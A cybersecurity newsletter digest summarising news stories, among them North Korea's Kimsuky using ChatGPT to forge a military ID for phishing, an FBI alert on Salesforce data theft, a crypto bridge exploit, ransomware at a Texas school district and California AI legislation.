DPRK's Kimsuky forged a deepfake military ID using ChatGPT for S. Korean attack

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

South Korean cybersecurity firm Genians reports that the suspected North Korean state-sponsored hacking group called Kimsuky used ChatGPT to create a deepfake of a military ID document to attack a target in South Korea.

Attackers used the artificial intelligence tool to craft a fake draft of a South Korean military identification card to create a realistic-looking image meant to make a phishing attempt seem more credible.

Instead of including a real image, the email linked to malware capable of extracting data from recipients’ devices, according to Genians.

Kimsuky is a suspected North Korea-sponsored cyber-espionage unit previously linked to other spying efforts against South Korean targets. The US Department of Homeland Security said Kimsuky “is most likely tasked by the North Korean regime with a global intelligence-gathering mission,” according to a 2020 advisory.

Genians previously released the "ClickFix Tactics Analysis Report" in early July. That report included cases disguised to resemble the security functions of South Korean portal companies.

In this attack, the threat actors disguised their activity to look like the CAPTCHA (reCAPTCHA) security functions of a South Korean portal company, deceiving the victim. Following the pop-up window instructions, malicious PowerShell commands were executed.

Genians’ threat analysts confirmed that the same malware used at that time was also employed in the current deepfake attack impersonating the defense sector. (Jane Lanhee Lee / Bloomberg and Genians)

Related: Cryptopolitan, Maeil Business Today, Korea Herald, Telangana Today, Mezha, Research Snipers, Invezz, Business Standard, Business Insider, Tech-Economic Times, The Korea Times, South China Morning Post, NK News, Korea Joong Ang Daily

The Helsinki Court of Appeal ordered the immediate release of Aleksanteri Kivimäki, who had been serving a six-year prison sentence after being convicted of orchestrating a severe data breach of the Vastaamo psychotherapy center.

As the appeal court began hearing the case in August of this year, his lawyer, Peter Jaari, demanded Kivimäki's release, saying that his client risked being imprisoned longer than his sentence if the appeal court changes the duration of his prison term.

If that were to occur, the state would be liable to pay Kivimäki compensation for the excess prison time.

Following an international search, Kivimäki was initially detained in February 2023. After a lengthy trial at Helsinki District Court, Kivimäki was handed a six-year and three-month prison sentence in April 2024 for charges related to the hacking of psychotherapy centre Vastaamo's patient database

The charges he was found guilty of included aggravated data breach, almost 9,600 counts of aggravated invasion of privacy related to the dissemination of information, more than 21,300 counts of attempted aggravated extortion, and 20 counts of aggravated blackmail.

During the trial, the court heard how Kivimäki hacked into the firm's database, containing the personal information of an estimated 33,000 people, in autumn 2018. A couple of years later, he allegedly attempted to extort money from both Vastaamo and its clients.

There were more victims in the case than in any other in Finnish criminal history.

During the trial, a lawyer representing some of the affected patients told the court that a number of the victims had died by suicide after their patient records had been stolen and used in extortion attempts. (YLE News)

Related: BankInfoSecurity, The Record, Helsinki Times

The FBI issued a FLASH alert warning that two threat clusters, tracked as UNC6040 and UNC6395, are compromising organizations’ Salesforce environments to steal data and extort victims.

"The Federal Bureau of Investigation (FBI) is releasing this FLASH to disseminate Indicators of Compromise (IOCs) associated with recent malicious cyber activities by cyber criminal groups UNC6040 and UNC6395, responsible for a rising number of data theft and extortion intrusions," reads the FBI's FLASH advisory.

"Both groups have recently been observed targeting organizations' Salesforce platforms via different initial access mechanisms. The FBI is releasing this information to maximize awareness and provide IOCs that recipients may use for research and network defense."

UNC6040 was first disclosed by Google Threat Intelligence (Mandiant) in June, who warned that since late 2024, threat actors were using social engineering and vishing attacks to trick employees into connecting malicious Salesforce Data Loader OAuth apps to their company's Salesforce accounts.

While the FBI did not name the groups behind these campaigns, the ShinyHunters extortion group claimed that they and other threat actors calling themselves "Scattered Lapsus$ Hunters, were behind both clusters of activity.

This group of hackers claims to have originated from and overlap with the Lapsus$, Scattered Spider, and ShinyHunters extortion groups. (Lawrence Abrams / Bleeping Computer)

Related: IC3, Security Week, IT Pro, Security Affairs, WebProNews

The Shiba Inu development team froze 4.6 million BONE tokens after blockchain security firm PeckShield identified a sophisticated attack targeting the Shibarium bridge infrastructure.

The attackers executed a flash loan exploit to acquire 4.6 million BONE tokens through compromised validator signing keys. This attack method allowed the hackers to gain majority control over the bridge system and attempt asset drainage from the Shibarium ecosystem.

The stolen tokens remained locked due to their delegation to Validator 1 and existing staking restrictions. This technical limitation gave the development team a crucial window to implement emergency measures. The team immediately suspended staking functions and initiated comprehensive security protocols to contain the breach.

Shiba Inu developers transferred stake manager funds to a hardware wallet secured through multisignature technology. The team launched a thorough audit of all validator keys to assess the extent of the compromise and identify potential vulnerabilities within the system architecture.

The stolen tokens were delegated to Validator 1; however, they stayed locked due to staking restrictions, and this allowed the Shiba Inu team to freeze the tokens. This technical safeguard proved instrumental in preventing the complete loss of community assets.

Security firms Hexens, Seal 911, and PeckShield are collaborating with the Shiba Inu team to investigate the breach. Law enforcement authorities have been notified about the incident. The development team made an unconventional offer to negotiate with the attackers, promising no legal action and offering a bounty reward in exchange for returning the stolen funds. (Newton Gitonga for Coinpaper)

Related: Forklog, Coindesk, BeInCrypto, Coinspeaker, The Block, OneSafe

Washington, DC, Attorney General Brian L. Schwalb unveiled a lawsuit against Athena Bitcoin, accusing the Bitcoin ATM operator of consistently ignoring scams targeting elderly residents and failing to disclose excessive fees.

The firm, which operates 4,100 Bitcoin ATMs in five countries, was charged with two counts of violating the Consumer Protection Procedures Act through deceptive and unfair trade practices. Athena was also charged with the financial exploitation of vulnerable adults and older people.

"We employ aggressive safety protocols to protect the financial interests of our customers, and we provide robust consumer education to ensure they are well informed of the risks, as well as safe practices, associated with kiosks," a spokesman for Athena said. "Our kiosks employ multiple safeguards, from prominent warnings and daily transaction limits to five separate verification screens designed to stop coerced transactions and confirm that bitcoin currency is going to a wallet that [the customer] owns."

In its first five months of operation within the nation’s capital, 93% of funds deposited into Athena’s kiosks were “the product of outright fraud,” according to a 30-page complaint. In 2023, Americans reported $189 million in losses from scams involving Bitcoin ATMs to the FBI. (André Beganski / Decrypt)

Related: DC Attorney General, DC Attorney General, Cointelegraph, JD Supra, WUSA, The Washington Informer, WJLA

According to a new report from the Department of Homeland Security's (DHS) Inspector General, DHS failed to effectively implement the Cyber Incentive program for cyber talent, with federal funds meant for the Cybersecurity and Infrastructure Security Agency used incorrectly. 

Instead of being targeted toward valuable talent likely to transition to the private sector, the payments were disbursed generally, with many ineligible employees receiving tens of thousands of dollars in payment. According to the report, 240 employees who didn’t hold roles directly related to cybersecurity received payment through the Cyber Incentive program. 

The agency’s human resources team didn’t track who received which payments, exacerbating the problem. More than 300 people also received erroneous back payments. 

The investigation was triggered following a hotline complaint sent to the OIG back in 2023. The OIG made eight recommendations to CISA, which concurred with all of them. (Rebecca Heilweil / FedScoop)

Related: DHS OIG, The Record, Infosecurity Magazine, The Register

Safety-oriented email service Proton Mail last month disabled email accounts belonging to journalists reporting on security breaches of various South Korean government computer systems following a complaint by an unspecified cybersecurity agency. 

After a public outcry and multiple weeks, the journalists’ accounts were eventually reinstated. However, the reporters and editors involved still want answers on how and why Proton decided to shut down the accounts in the first place.

Martin Shelton, deputy director of digital security at the Freedom of the Press Foundation, highlighted that numerous newsrooms use Proton’s services as alternatives to something like Gmail “specifically to avoid situations like this,” pointing out that “While it’s good to see that Proton is reconsidering account suspensions, journalists are among the users who need these and similar tools most.” Newsrooms like The Intercept, the Boston Globe, and the Tampa Bay Times all rely on Proton Mail for emailed tip submissions. (Nikita Mazurov / The Intercept)

Related: Slashdot, Cyber Insider, PCMag, WebProNews

French authorities dismantled the "Dark French Anti-System" platform, considered the last French-speaking darknet marketplace, and arrested two men, the alleged creator, born in 1997, and an active contributor, born in 1989.

More than six bitcoins, worth about €600,000, were seized. The investigation, launched by Cyberdouanes in 2023, uncovered over 12,000 members and 110,000 published messages. This operation closes a series of successive dismantlings carried out by French authorities since 2018.

The investigation began in 2023, led by the French customs intelligence unit DNRED. Cyberdouanes noted a steady growth in activity, despite earlier takedowns of French-speaking marketplaces. DFAS had more than 12,000 active members and over 110,000 messages. The site also served as a refuge for former users of previously dismantled platforms. (Damien Bancal / Zataz)

Related: RFI

Researchers at Okta exposed a new online fraud service, named VoidProxy, a Phishing-as-a-Service (PhaaS), a platform that provides all the tools needed to launch cyberattacks.

The platform allows attackers to bypass common multi-factor authentication (MFA) methods. The service uses an Adversary-in-the-Middle (AitM) to intercept passwords, MFA codes, and other information in real-time.

VoidProxy is built on a clever two-part infrastructure designed to evade detection. It uses a disposable front-end and a resilient back-end, allowing criminals to quickly abandon parts that are discovered while their main system keeps running.

The platform also uses multiple layers of anti-analysis features, including compromised email accounts, redirects, and security checks like Cloudflare CAPTCHA, to make it difficult for security teams to track, which has kept it hidden so far. This advanced setup, with its admin panel allowing criminals to receive stolen information in real-time, often via Telegram or other online services, shows just how automated the operation is.

The platform was ultimately discovered when it failed to compromise a user protected by Okta’s phishing-resistant authenticator, Okta FastPass, which provided researchers with a key to unravelling the entire scheme. (Deeba Ahmed / HackRead)

Related: Okta, CSO Online

The Federal Trade Commission announced it is issuing orders to seven companies, including OpenAI, Alphabet, Meta, xAI, and Snap, to understand how their artificial intelligence chatbots potentially negatively affect children and teenagers.

The federal agency said AI chatbots may be used to simulate human-like communication and intrapersonal relationships with users, and that it wants to understand what steps these companies have taken to “evaluate the safety of these chatbots when acting as companions,” according to a release.

“Protecting kids online is a top priority for the Trump-Vance FTC, and so is fostering innovation in critical sectors of our economy,” FTC Chairman Andrew Ferguson said in a statement.

The FTC said it is seeking information about how these companies monetize user engagement, develop and approve characters, use or share personal information, monitor and enforce compliance with company rules and terms of service, and mitigate negative impacts, among other subjects. (Ashley Capoot / CNBC)

Related: FTC, SC Media, ZDNET, Fast Company, UNDERCODE NEWS, Mashable

The Uvalde Consolidated Independent School District will close for most of next week after the district detected ransomware in its servers, according to district officials.

The district will close from Sept. 15-18 and will exchange the dates it is closed with other previously scheduled non-working days integrated into the current UCISD calendar.

The ransomware detected by the district is affecting several essential online systems, including phones, thermostats, camera monitoring, and visitor management systems, among critical services, the district said. Uvalde CISD said these systems are essential to maintain the safety and security of the community it serves.

“We have reported this incident to the FBI, our district’s insurance cybersecurity team, and other relevant agencies,” the district said. (Ivan Herrera / KSAT)

Related: News4 San Antonio, My San Antonio, San Antonio Express News, KABB

An unknown perpetrator hacked five washing machines in a student housing development called the Spinoza Campus in Amsterdam.

For weeks, the hacker took control of the payment system, allowing students to do their laundry for free.

The management company behind the service, DUWO, closed the laundry room in July. More than a thousand students have been unable to do their laundry there. (Toon Meijerink / Folia)

Related: The Register, Tom's Hardware, WebProNews

Israeli Transportation Minister Miri Regev received hundreds of threats and abusive messages from Turkish phone numbers after her mobile number was circulated on X.

I am Turkish, I will send you to hell,” one message read. Others told her, “Hitler was right, he should have killed you all,” and “We will bury you and your country.” Another sender wrote, “Never forget this, your death is near. We are the defenders of Qassam,” referring to the military wing of Hamas. One demanded, “Be brave and be a man. Come and answer me. You dirty cowardly pigs.”Top Videos

Regev’s phone number was one of 11 belonging to Israeli ministers that were posted online. The list also included the numbers of former defense minister Yoav Gallant and Prime Minister Benjamin Netanyahu, though it was noted that Netanyahu’s number might be outdated.

Other ministers whose numbers were reportedly exposed include Yariv Levin, Eli Cohen, Dudi Amsalem, Yoav Kisch, Miki Zohar, Avi Dichter, and Nir Barkat.

The wave of harassment followed a cyber incident two days earlier when a Turkish hacking group released the personal number of Foreign Minister Israel Katz and managed to connect with him briefly in a video call. Before Katz disconnected, the hacker shouted curses and captured a screenshot. Katz’s phone was also flooded with thousands of threatening and insulting messages. (Itamar Eichner / Ynet News)

Related: Agencia Nova, Caliber, Arab News, Turkiye Today, Daily Sabah

Vietnamese authorities are warning citizens to be aware of scams in the wake of the country's National Credit Information Center (CIC) breach.

The Criminal Investigation Department of the Ho Chi Minh City Police released a statement noting that scammers could exploit the leaked personal information from CIC to carry out elaborate fraudulent schemes. (Vietnamnet Global)

Related: Saigon News, Tuoi Tre, Vietnam News

Gavin Newsom will have to decide for the second year in a row whether to sign landmark AI safety legislation that could test the ambitious California governor’s ties with the state’s deep-pocketed tech industry.

The bill, which cleared a final vote in the state Legislature in the early hours of Saturday morning, would require AI companies to disclose their safety testing regimes and certify they are following them at a time when many are still wary of the emerging technology.

It could also sow the seeds for a burgeoning national standard on AI safety, given California’s role as the home of the industry and track record for inspiring other states on tech regulation.

Newsom vetoed a similar though more expansive measure last year by the same state senator, San Francisco Democrat Scott Wiener, citing concerns about hampering innovation. (Chase DiFeliciantonio / Politico)

Related: TechCrunch, Maginative, Benzinga, PC Mag, dailyjournal.com, San Francisco Chronicle, Vox, r/California

A California bill to check kids’ ages online is heading to Gov. Gavin Newsom’s desk, after it secured rare support from major tech giants, including Google, Meta, and Snap.

The proposal, which would require device makers and app stores to verify user ages, cleared the state Assembly 58-0 in the early hours of Saturday with backing from Republicans and Democrats.

Google and Meta, plus other tech firms like OpenAI and Pinterest, rallied around the online age verification plan this week despite recently sparring over similar measures in Utah and Texas.

They argue the measure from Democratic state Assemblymember Buffy Wicks offers a more reasonable solution and hope it becomes a de facto national standard for other states weighing mandatory age-checks amid bipartisan concerns about kids’ safety online. (Tyler Katzenberger / Politico)

Related: Engadget, Bloomberg Law, r/Askpolitics

Best Thing of the Day: Take a Bow, Bogdan

Engineer Bogdan Ionescu ran a web server on a disposable vape.

Worst Thing of the Day: Cybercrime's Whack-a-Mole Game Continues

The FBI’s takedown last month of the RapperBot appeared to have an unwanted consequence: freeing up as many as 95,000 devices to be taken over by new botnet overlords. That led to a free-for-all to take over the machines “as fast as possible."

Closing Thought